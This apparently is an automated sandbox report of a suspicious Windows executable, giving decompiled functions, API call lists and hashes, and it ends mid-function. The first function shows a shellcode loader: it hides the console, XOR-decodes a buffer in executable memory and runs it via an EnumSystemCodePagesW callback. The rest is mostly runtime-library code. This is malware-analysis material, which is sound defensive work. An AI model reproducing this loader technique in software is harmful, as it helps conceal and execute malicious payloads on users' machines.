7793 4017fe __invoke_watson 8 API calls 7792->7793 7792->7797 7794 40ae8d 7793->7794 7795 40c10f __fltout2 55 API calls 7794->7795 7796 40aec0 7795->7796 7798 40aed7 7796->7798 7799 40aec7 7796->7799 7797->7693 7801 40aee8 7798->7801 7802 40aede 7798->7802 7800 4024c9 ___strgtold12_l 55 API calls 7799->7800 7803 40aecc 7800->7803 7806 40bf97 __fptostr 55 API calls 7801->7806 7804 4024c9 ___strgtold12_l 55 API calls 7802->7804 7805 4017ee ___strgtold12_l 8 API calls 7803->7805 7804->7803 7807 40aed3 7805->7807 7808 40af28 7806->7808 7810 40412d __setmbcp_nolock 6 API calls 7807->7810 7808->7807 7809 40ad3d __cftoe2_l 55 API calls 7808->7809 7809->7807 7811 40af58 7810->7811 7811->7693 7813 40ae8e __cftoe_l 55 API calls 7812->7813 7814 40ad38 7813->7814 7814->7712 7946 4093bc 7947 4093d2 7946->7947 7948 4093c6 7946->7948 7948->7947 7949 4093cb CloseHandle 7948->7949 7949->7947

                                                          Control-flow Graph

                                                          C-Code - Quality: 79%
                                                          			E00401000(struct HWND__* __eax, intOrPtr _a8) {
                                                          				void* _t8;
                                                          				_Unknown_base(*)()* _t20;
                                                          				void* _t23;
                                                          
                                                          				_t23 = 0;
                                                          				__imp__GetConsoleWindow(); // executed
                                                          				ShowWindow(__eax, 0); // executed
                                                          				_t8 = E0040142D( *((intOrPtr*)(_a8 + 4)), 0x413000);
                                                          				_t20 = VirtualAlloc(0, 0x1c32, 0x3000, 0x40);
                                                          				E00401381(_t20, 0x1c32, 1, _t8);
                                                          				do {
                                                          					 *(_t20 + _t23) = ((( *(_t20 + _t23) ^ 0x000000f1) + 0x00000020 ^ 0x000000d6) - 0x0000003b ^ 0x000000f1) + 0x52;
                                                          					_t23 = _t23 + 1;
                                                          				} while (_t23 < 0x1c32);
                                                          				EnumSystemCodePagesW(_t20, 0);
                                                          				return 0;
                                                          			}






                                                          0x00401006
                                                          0x00401009
                                                          0x00401010
                                                          0x00401021
                                                          0x00401045
                                                          0x00401049
                                                          0x00401051
                                                          0x00401060
                                                          0x00401063
                                                          0x00401064
                                                          0x0040106b
                                                          0x00401077

                                                          APIs
                                                          • GetConsoleWindow.KERNELBASE(00000000), ref: 00401009
                                                          • ShowWindow.USER32(00000000), ref: 00401010
                                                            • Part of subcall function 0040142D: __wfsopen.LIBCMT ref: 00401438
                                                          • VirtualAlloc.KERNEL32(00000000,00001C32,00003000,00000040), ref: 00401037
                                                          • __fread_nolock.LIBCMT ref: 00401049
                                                          • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 0040106B
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: Window$AllocCodeConsoleEnumPagesShowSystemVirtual__fread_nolock__wfsopen
                                                          • String ID:
                                                          • API String ID: 2083855422-0
                                                          • Opcode ID: 3c289a7e2788801508f1124182579073f029ebc2bbbe1936ee20a837efefdb76
                                                          • Instruction ID: 77e8c0aaf0c9974a4cee49b3b5cf3efa8b7ee5b121ee9e12007cb8c764029d75
                                                          • Opcode Fuzzy Hash: 3c289a7e2788801508f1124182579073f029ebc2bbbe1936ee20a837efefdb76
                                                          • Instruction Fuzzy Hash: BBF07D329403143FFB1027735C8AFDB3F9CD746760F004436FA086A092D574E84246B8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 208 408702-40870b 209 408711-40871a 208->209 210 4087fb-4087fd 208->210 211 408723-40872c 209->211 212 40871c-408722 call 404535 209->212 214 408735-40873e 211->214 215 40872e-408734 call 404535 211->215 212->211 217 408740-408746 call 404535 214->217 218 408747-408750 214->218 215->214 217->218 222 408752-408758 call 404535 218->222 223 408759-408762 218->223 222->223 226 408764-40876a call 404535 223->226 227 40876b-408774 223->227 226->227 230 408776-40877c call 404535 227->230 231 40877d-408786 227->231 230->231 233 408788-40878e call 404535 231->233 234 40878f-408798 231->234 233->234 238 4087a1-4087aa 234->238 239 40879a-4087a0 call 404535 234->239 242 4087b3-4087bc 238->242 243 4087ac-4087b2 call 404535 238->243 239->238 246 4087c5-4087ce 242->246 247 4087be-4087c4 call 404535 242->247 243->242 249 4087d0-4087d6 call 404535 246->249 250 4087d7-4087e0 246->250 247->246 249->250 254 4087e2-4087e8 call 404535 250->254 255 4087e9-4087f2 250->255 254->255 255->210 258 4087f4-4087fa call 404535 255->258 258->210
                                                          C-Code - Quality: 100%
                                                          			E00408702(intOrPtr _a4) {
                                                          				intOrPtr _t15;
                                                          				intOrPtr _t54;
                                                          				void* _t56;
                                                          				void* _t57;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				void* _t61;
                                                          				void* _t62;
                                                          				void* _t63;
                                                          				void* _t64;
                                                          				void* _t65;
                                                          				void* _t66;
                                                          				void* _t67;
                                                          				void* _t68;
                                                          
                                                          				_t54 = _a4;
                                                          				if(_t54 != 0) {
                                                          					_t2 = _t54 + 0xc; // 0xf000000
                                                          					_t56 =  *_t2 -  *0x413e34; // 0x415054
                                                          					if(_t56 != 0) {
                                                          						E00404535(_t16);
                                                          					}
                                                          					_t3 = _t54 + 0x10; // 0x254804b7
                                                          					_t57 =  *_t3 -  *0x413e38; // 0x415054
                                                          					if(_t57 != 0) {
                                                          						E00404535(_t17);
                                                          					}
                                                          					_t4 = _t54 + 0x14; // 0x8000
                                                          					_t58 =  *_t4 -  *0x413e3c; // 0x415054
                                                          					if(_t58 != 0) {
                                                          						E00404535(_t18);
                                                          					}
                                                          					_t5 = _t54 + 0x18; // 0xfc7d80
                                                          					_t59 =  *_t5 -  *0x413e40; // 0x415054
                                                          					if(_t59 != 0) {
                                                          						E00404535(_t19);
                                                          					}
                                                          					_t6 = _t54 + 0x1c; // 0x4d8b0774
                                                          					_t60 =  *_t6 -  *0x413e44; // 0x415054
                                                          					if(_t60 != 0) {
                                                          						E00404535(_t20);
                                                          					}
                                                          					_t7 = _t54 + 0x20; // 0x706183f8
                                                          					_t61 =  *_t7 -  *0x413e48; // 0x415054
                                                          					if(_t61 != 0) {
                                                          						E00404535(_t21);
                                                          					}
                                                          					_t8 = _t54 + 0x24; // 0x5de58bfd
                                                          					_t62 =  *_t8 -  *0x413e4c; // 0x415054
                                                          					if(_t62 != 0) {
                                                          						E00404535(_t22);
                                                          					}
                                                          					_t9 = _t54 + 0x38; // 0x8b55c35d
                                                          					_t63 =  *_t9 -  *0x413e60; // 0x415058
                                                          					if(_t63 != 0) {
                                                          						E00404535(_t23);
                                                          					}
                                                          					_t10 = _t54 + 0x3c; // 0x10ec83ec
                                                          					_t64 =  *_t10 -  *0x413e64; // 0x415058
                                                          					if(_t64 != 0) {
                                                          						E00404535(_t24);
                                                          					}
                                                          					_t11 = _t54 + 0x40; // 0x758b5653
                                                          					_t65 =  *_t11 -  *0x413e68; // 0x415058
                                                          					if(_t65 != 0) {
                                                          						E00404535(_t25);
                                                          					}
                                                          					_t12 = _t54 + 0x44; // 0x74f6850c
                                                          					_t66 =  *_t12 -  *0x413e6c; // 0x415058
                                                          					if(_t66 != 0) {
                                                          						E00404535(_t26);
                                                          					}
                                                          					_t13 = _t54 + 0x48; // 0x105d8b18
                                                          					_t67 =  *_t13 -  *0x413e70; // 0x415058
                                                          					if(_t67 != 0) {
                                                          						E00404535(_t27);
                                                          					}
                                                          					_t14 = _t54 + 0x4c; // 0x1174db85
                                                          					_t15 =  *_t14;
                                                          					_t68 = _t15 -  *0x413e74; // 0x415058
                                                          					if(_t68 != 0) {
                                                          						return E00404535(_t15);
                                                          					}
                                                          				}
                                                          				return _t15;
                                                          			}


















                                                          0x00408706
                                                          0x0040870b
                                                          0x00408711
                                                          0x00408714
                                                          0x0040871a
                                                          0x0040871d
                                                          0x00408722
                                                          0x00408723
                                                          0x00408726
                                                          0x0040872c
                                                          0x0040872f
                                                          0x00408734
                                                          0x00408735
                                                          0x00408738
                                                          0x0040873e
                                                          0x00408741
                                                          0x00408746
                                                          0x00408747
                                                          0x0040874a
                                                          0x00408750
                                                          0x00408753
                                                          0x00408758
                                                          0x00408759
                                                          0x0040875c
                                                          0x00408762
                                                          0x00408765
                                                          0x0040876a
                                                          0x0040876b
                                                          0x0040876e
                                                          0x00408774
                                                          0x00408777
                                                          0x0040877c
                                                          0x0040877d
                                                          0x00408780
                                                          0x00408786
                                                          0x00408789
                                                          0x0040878e
                                                          0x0040878f
                                                          0x00408792
                                                          0x00408798
                                                          0x0040879b
                                                          0x004087a0
                                                          0x004087a1
                                                          0x004087a4
                                                          0x004087aa
                                                          0x004087ad
                                                          0x004087b2
                                                          0x004087b3
                                                          0x004087b6
                                                          0x004087bc
                                                          0x004087bf
                                                          0x004087c4
                                                          0x004087c5
                                                          0x004087c8
                                                          0x004087ce
                                                          0x004087d1
                                                          0x004087d6
                                                          0x004087d7
                                                          0x004087da
                                                          0x004087e0
                                                          0x004087e3
                                                          0x004087e8
                                                          0x004087e9
                                                          0x004087e9
                                                          0x004087ec
                                                          0x004087f2
                                                          0x00000000
                                                          0x004087fa
                                                          0x004087f2
                                                          0x004087fd

                                                          APIs
                                                          • _free.LIBCMT ref: 0040871D
                                                            • Part of subcall function 00404535: HeapFree.KERNEL32(00000000,00000000,?,00402F89,00000000,00401466,00411E80,0000000C,0040143D,?,?,00000040,?,00401026,?,00413000), ref: 00404549
                                                            • Part of subcall function 00404535: GetLastError.KERNEL32(00000000,?,00402F89,00000000,00401466,00411E80,0000000C,0040143D,?,?,00000040,?,00401026,?,00413000), ref: 0040455B
                                                          • _free.LIBCMT ref: 0040872F
                                                          • _free.LIBCMT ref: 00408741
                                                          • _free.LIBCMT ref: 00408753
                                                          • _free.LIBCMT ref: 00408765
                                                          • _free.LIBCMT ref: 00408777
                                                          • _free.LIBCMT ref: 00408789
                                                          • _free.LIBCMT ref: 0040879B
                                                          • _free.LIBCMT ref: 004087AD
                                                          • _free.LIBCMT ref: 004087BF
                                                          • _free.LIBCMT ref: 004087D1
                                                          • _free.LIBCMT ref: 004087E3
                                                          • _free.LIBCMT ref: 004087F5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: c6c0e77dc8294a2ea5e944199d3f13d286ad74d2b3f09fe072b3a39078fcd2db
                                                          • Instruction ID: f04fc6fc6f9de8751afe861eb1d73b392140216a2a145ff1f7222b8b789f6bc8
                                                          • Opcode Fuzzy Hash: c6c0e77dc8294a2ea5e944199d3f13d286ad74d2b3f09fe072b3a39078fcd2db
                                                          • Instruction Fuzzy Hash: 7B212FB2504304BBC624EF29FDC1C5673F9AA443127A4482EF285F76D5DA78FD808A2C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 91%
                                                          			E0040304B(void* __ebx, void* __edi, void* __eflags) {
                                                          				void* __esi;
                                                          				void* _t3;
                                                          				intOrPtr _t6;
                                                          				long _t14;
                                                          				long* _t27;
                                                          
                                                          				E004031FA(_t3);
                                                          				if(E004044E7() != 0) {
                                                          					_t6 = E00403D67(E00402DDC);
                                                          					 *0x413508 = _t6;
                                                          					__eflags = _t6 - 0xffffffff;
                                                          					if(_t6 == 0xffffffff) {
                                                          						goto L1;
                                                          					} else {
                                                          						_t27 = E0040456D(1, 0x3bc);
                                                          						__eflags = _t27;
                                                          						if(_t27 == 0) {
                                                          							L6:
                                                          							E004030C1();
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						} else {
                                                          							__eflags = E00403DC3( *0x413508, _t27);
                                                          							if(__eflags == 0) {
                                                          								goto L6;
                                                          							} else {
                                                          								_push(0);
                                                          								_push(_t27);
                                                          								E00402F98(__ebx, __edi, _t27, __eflags);
                                                          								_t14 = GetCurrentThreadId();
                                                          								_t27[1] = _t27[1] | 0xffffffff;
                                                          								 *_t27 = _t14;
                                                          								__eflags = 1;
                                                          								return 1;
                                                          							}
                                                          						}
                                                          					}
                                                          				} else {
                                                          					L1:
                                                          					E004030C1();
                                                          					return 0;
                                                          				}
                                                          			}








                                                          0x0040304b
                                                          0x00403057
                                                          0x00403066
                                                          0x0040306b
                                                          0x00403071
                                                          0x00403074
                                                          0x00000000
                                                          0x00403076
                                                          0x00403083
                                                          0x00403087
                                                          0x00403089
                                                          0x004030b8
                                                          0x004030b8
                                                          0x004030bd
                                                          0x004030c0
                                                          0x0040308b
                                                          0x00403099
                                                          0x0040309b
                                                          0x00000000
                                                          0x0040309d
                                                          0x0040309d
                                                          0x0040309f
                                                          0x004030a0
                                                          0x004030a7
                                                          0x004030ad
                                                          0x004030b1
                                                          0x004030b5
                                                          0x004030b7
                                                          0x004030b7
                                                          0x0040309b
                                                          0x00403089
                                                          0x00403059
                                                          0x00403059
                                                          0x00403059
                                                          0x00403060
                                                          0x00403060

                                                          APIs
                                                          • __init_pointers.LIBCMT ref: 0040304B
                                                            • Part of subcall function 004031FA: RtlEncodePointer.NTDLL(00000000,?,00403050,0040157E,00411EA0,00000014), ref: 004031FD
                                                            • Part of subcall function 004031FA: __initp_misc_winsig.LIBCMT ref: 00403218
                                                            • Part of subcall function 004031FA: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00403E5A
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00403E6E
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00403E81
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00403E94
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00403EA7
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00403EBA
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00403ECD
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00403EE0
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00403EF3
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00403F06
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00403F19
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00403F2C
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00403F3F
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00403F52
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00403F65
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00403F78
                                                          • __mtinitlocks.LIBCMT ref: 00403050
                                                          • __mtterm.LIBCMT ref: 00403059
                                                            • Part of subcall function 004030C1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0040305E,0040157E,00411EA0,00000014), ref: 00404401
                                                            • Part of subcall function 004030C1: _free.LIBCMT ref: 00404408
                                                            • Part of subcall function 004030C1: DeleteCriticalSection.KERNEL32(pKA,?,?,0040305E,0040157E,00411EA0,00000014), ref: 0040442A
                                                          • __calloc_crt.LIBCMT ref: 0040307E
                                                          • __initptd.LIBCMT ref: 004030A0
                                                          • GetCurrentThreadId.KERNEL32 ref: 004030A7
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                          • String ID:
                                                          • API String ID: 3567560977-0
                                                          • Opcode ID: e33af350f6e9ef2e6780073be376e251c14a03b5d83e9ec52140cb940fccbdab
                                                          • Instruction ID: 2115b65a6a9c202ad142230a1a1e4feb1784a8349ca752f000b05186f7d9f433
                                                          • Opcode Fuzzy Hash: e33af350f6e9ef2e6780073be376e251c14a03b5d83e9ec52140cb940fccbdab
                                                          • Instruction Fuzzy Hash: 49F06D3216A6112DE6387F766C07A4B2E9C8F01B7AF20463FF560B51D6EE398A81419C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 285 40916c-409179 286 409193 285->286 287 40917b-409180 285->287 288 409195-40919a 286->288 287->286 289 409182-409185 287->289 290 409187-40918c 289->290 291 40919b-4091b1 call 405da9 289->291 290->286 293 40918e-409190 290->293 295 4091b3-4091b8 291->295 296 4091c8-4091d9 call 409121 291->296 293->286 297 4091c0-4091c3 295->297 298 4091ba-4091bd 295->298 304 40921b-40923c MultiByteToWideChar 296->304 305 4091db-4091e2 296->305 300 40924c-409250 297->300 298->297 302 409252-409255 300->302 303 409259-40925c 300->303 302->303 303->288 304->300 306 40923e-409246 call 4024c9 304->306 307 4091e4-4091e7 305->307 308 40920b 305->308 306->300 310 4091e9-409209 MultiByteToWideChar 307->310 311 40920e 307->311 308->311 310->308 314 409216-409219 310->314 311->306 312 409210-409214 311->312 312->306 312->314 314->300
                                                          C-Code - Quality: 100%
                                                          			E0040916C(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                          				char _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v20;
                                                          				signed int _t35;
                                                          				int _t38;
                                                          				signed int _t41;
                                                          				int _t42;
                                                          				intOrPtr* _t44;
                                                          				int _t47;
                                                          				short* _t49;
                                                          				intOrPtr _t50;
                                                          				intOrPtr _t54;
                                                          				int _t55;
                                                          				signed int _t59;
                                                          				char* _t62;
                                                          
                                                          				_t62 = _a8;
                                                          				if(_t62 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				}
                                                          				_t50 = _a12;
                                                          				if(_t50 == 0) {
                                                          					goto L5;
                                                          				}
                                                          				if( *_t62 != 0) {
                                                          					E00405DA9( &_v20, _a16);
                                                          					_t35 = _v20;
                                                          					__eflags =  *(_t35 + 0xa8);
                                                          					if( *(_t35 + 0xa8) != 0) {
                                                          						_t38 = E00409121( *_t62 & 0x000000ff,  &_v20);
                                                          						__eflags = _t38;
                                                          						if(_t38 == 0) {
                                                          							__eflags = _a4;
                                                          							_t41 = _v20;
                                                          							_t59 = 1;
                                                          							_t28 = _t41 + 4; // 0x840ffff8
                                                          							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                          							__eflags = _t42;
                                                          							if(_t42 != 0) {
                                                          								L21:
                                                          								__eflags = _v8;
                                                          								if(_v8 != 0) {
                                                          									_t54 = _v12;
                                                          									_t31 = _t54 + 0x70;
                                                          									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                          									__eflags =  *_t31;
                                                          								}
                                                          								return _t59;
                                                          							}
                                                          							L20:
                                                          							_t44 = E004024C9();
                                                          							_t59 = _t59 | 0xffffffff;
                                                          							__eflags = _t59;
                                                          							 *_t44 = 0x2a;
                                                          							goto L21;
                                                          						}
                                                          						_t59 = _v20;
                                                          						__eflags =  *(_t59 + 0x74) - 1;
                                                          						if( *(_t59 + 0x74) <= 1) {
                                                          							L15:
                                                          							_t20 = _t59 + 0x74; // 0xe1c11fe1
                                                          							__eflags = _t50 -  *_t20;
                                                          							L16:
                                                          							if(__eflags < 0) {
                                                          								goto L20;
                                                          							}
                                                          							__eflags = _t62[1];
                                                          							if(_t62[1] == 0) {
                                                          								goto L20;
                                                          							}
                                                          							L18:
                                                          							_t22 = _t59 + 0x74; // 0xe1c11fe1
                                                          							_t59 =  *_t22;
                                                          							goto L21;
                                                          						}
                                                          						_t12 = _t59 + 0x74; // 0xe1c11fe1
                                                          						__eflags = _t50 -  *_t12;
                                                          						if(__eflags < 0) {
                                                          							goto L16;
                                                          						}
                                                          						__eflags = _a4;
                                                          						_t17 = _t59 + 0x74; // 0xe1c11fe1
                                                          						_t18 = _t59 + 4; // 0x840ffff8
                                                          						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                          						_t59 = _v20;
                                                          						__eflags = _t47;
                                                          						if(_t47 != 0) {
                                                          							goto L18;
                                                          						}
                                                          						goto L15;
                                                          					}
                                                          					_t55 = _a4;
                                                          					__eflags = _t55;
                                                          					if(_t55 != 0) {
                                                          						 *_t55 =  *_t62 & 0x000000ff;
                                                          					}
                                                          					_t59 = 1;
                                                          					goto L21;
                                                          				}
                                                          				_t49 = _a4;
                                                          				if(_t49 != 0) {
                                                          					 *_t49 = 0;
                                                          				}
                                                          				goto L5;
                                                          			}


















                                                          0x00409174
                                                          0x00409179
                                                          0x00409193
                                                          0x00000000
                                                          0x00409193
                                                          0x0040917b
                                                          0x00409180
                                                          0x00000000
                                                          0x00000000
                                                          0x00409185
                                                          0x004091a2
                                                          0x004091a7
                                                          0x004091aa
                                                          0x004091b1
                                                          0x004091d0
                                                          0x004091d7
                                                          0x004091d9
                                                          0x0040921d
                                                          0x00409229
                                                          0x0040922c
                                                          0x00409231
                                                          0x00409234
                                                          0x0040923a
                                                          0x0040923c
                                                          0x0040924c
                                                          0x0040924c
                                                          0x00409250
                                                          0x00409252
                                                          0x00409255
                                                          0x00409255
                                                          0x00409255
                                                          0x00409255
                                                          0x00000000
                                                          0x0040925b
                                                          0x0040923e
                                                          0x0040923e
                                                          0x00409243
                                                          0x00409243
                                                          0x00409246
                                                          0x00000000
                                                          0x00409246
                                                          0x004091db
                                                          0x004091de
                                                          0x004091e2
                                                          0x0040920b
                                                          0x0040920b
                                                          0x0040920b
                                                          0x0040920e
                                                          0x0040920e
                                                          0x00000000
                                                          0x00000000
                                                          0x00409210
                                                          0x00409214
                                                          0x00000000
                                                          0x00000000
                                                          0x00409216
                                                          0x00409216
                                                          0x00409216
                                                          0x00000000
                                                          0x00409216
                                                          0x004091e4
                                                          0x004091e4
                                                          0x004091e7
                                                          0x00000000
                                                          0x00000000
                                                          0x004091eb
                                                          0x004091f5
                                                          0x004091fb
                                                          0x004091fe
                                                          0x00409204
                                                          0x00409207
                                                          0x00409209
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00409209
                                                          0x004091b3
                                                          0x004091b6
                                                          0x004091b8
                                                          0x004091bd
                                                          0x004091bd
                                                          0x004091c2
                                                          0x00000000
                                                          0x004091c2
                                                          0x00409187
                                                          0x0040918c
                                                          0x00409190
                                                          0x00409190
                                                          0x00000000

                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004091A2
                                                          • __isleadbyte_l.LIBCMT ref: 004091D0
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 004091FE
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00409234
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID: .\@
                                                          • API String ID: 3058430110-2906710320
                                                          • Opcode ID: a3a2b69d6d2b9a4b6c28d472179e9680dc856bfc5fdc6e53166ac95398402672
                                                          • Instruction ID: de8054beb32b7dc64be8669cb2ea50c94ab5c5166fc26728190ff957983d3686
                                                          • Opcode Fuzzy Hash: a3a2b69d6d2b9a4b6c28d472179e9680dc856bfc5fdc6e53166ac95398402672
                                                          • Instruction Fuzzy Hash: 0A31A130604206BFEB218E65CC48BAB7BA5FF41310F15487EE864AB2D2D738DC51DB99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 315 4011bc-4011d5 316 4011f2 315->316 317 4011d7-4011dc 315->317 318 4011f4-4011fa 316->318 317->316 319 4011de-4011e0 317->319 320 4011e2-4011e7 call 4024c9 319->320 321 4011fb-401200 319->321 329 4011ed call 4017ee 320->329 322 401202-40120c 321->322 323 40120e-401212 321->323 322->323 325 401232-401241 322->325 326 401222-401224 323->326 327 401214-40121f call 401b60 323->327 332 401243-401246 325->332 333 401248 325->333 326->320 331 401226-401230 326->331 327->326 329->316 331->320 331->325 336 40124d-401252 332->336 333->336 337 401258-40125f 336->337 338 40133b-40133e 336->338 339 4012a0-4012a2 337->339 340 401261-401269 337->340 338->318 342 4012a4-4012a6 339->342 343 40130c-401316 call 401829 339->343 340->339 341 40126b 340->341 344 401271-401273 341->344 345 401369 341->345 346 4012a8-4012b0 342->346 347 4012ca-4012d5 342->347 353 40136d-401376 343->353 361 401318-40131d 343->361 351 401275-401277 344->351 352 40127a-40127f 344->352 345->353 354 4012c0-4012c4 346->354 355 4012b2-4012be 346->355 349 4012d7 347->349 350 4012d9-4012dc 347->350 349->350 357 401343-401347 350->357 358 4012de-4012e9 call 40194a 350->358 351->352 352->357 359 401285-40129e call 401ade 352->359 353->318 360 4012c6-4012c8 354->360 355->360 362 401359-401364 call 4024c9 357->362 363 401349-401356 call 401b60 357->363 373 4012ea call 401d04 358->373 375 401301-40130a 359->375 360->350 361->357 366 40131f-401330 361->366 362->329 363->362 371 401333-401335 366->371 371->337 371->338 376 4012ef-4012f4 373->376 375->371 377 4012fa-4012fd 376->377 378 40137b-40137f 376->378 377->345 379 4012ff 377->379 378->353 379->375
                                                          C-Code - Quality: 69%
                                                          			E004011BC(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                          				char* _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				void* __ebx;
                                                          				void* __esi;
                                                          				signed int _t74;
                                                          				signed int _t78;
                                                          				char _t81;
                                                          				signed int _t86;
                                                          				signed int _t88;
                                                          				signed int _t91;
                                                          				signed int _t94;
                                                          				signed int _t97;
                                                          				signed int _t98;
                                                          				char* _t99;
                                                          				signed int _t100;
                                                          				signed int _t102;
                                                          				signed int _t103;
                                                          				signed int _t104;
                                                          				char* _t110;
                                                          				signed int _t113;
                                                          				signed int _t117;
                                                          				signed int _t119;
                                                          				void* _t120;
                                                          
                                                          				_t99 = _a4;
                                                          				_t74 = _a8;
                                                          				_v8 = _t99;
                                                          				_v12 = _t74;
                                                          				if(_a12 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				}
                                                          				_t97 = _a16;
                                                          				if(_t97 == 0) {
                                                          					goto L5;
                                                          				}
                                                          				if(_t99 != 0) {
                                                          					_t119 = _a20;
                                                          					__eflags = _t119;
                                                          					if(_t119 == 0) {
                                                          						L9:
                                                          						__eflags = _a8 - 0xffffffff;
                                                          						if(_a8 != 0xffffffff) {
                                                          							_t74 = E00401B60(_t99, 0, _a8);
                                                          							_t120 = _t120 + 0xc;
                                                          						}
                                                          						__eflags = _t119;
                                                          						if(_t119 == 0) {
                                                          							goto L3;
                                                          						} else {
                                                          							_t78 = _t74 | 0xffffffff;
                                                          							__eflags = _t97 - _t78 / _a12;
                                                          							if(_t97 > _t78 / _a12) {
                                                          								goto L3;
                                                          							}
                                                          							L13:
                                                          							_t117 = _a12 * _t97;
                                                          							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                          							_t98 = _t117;
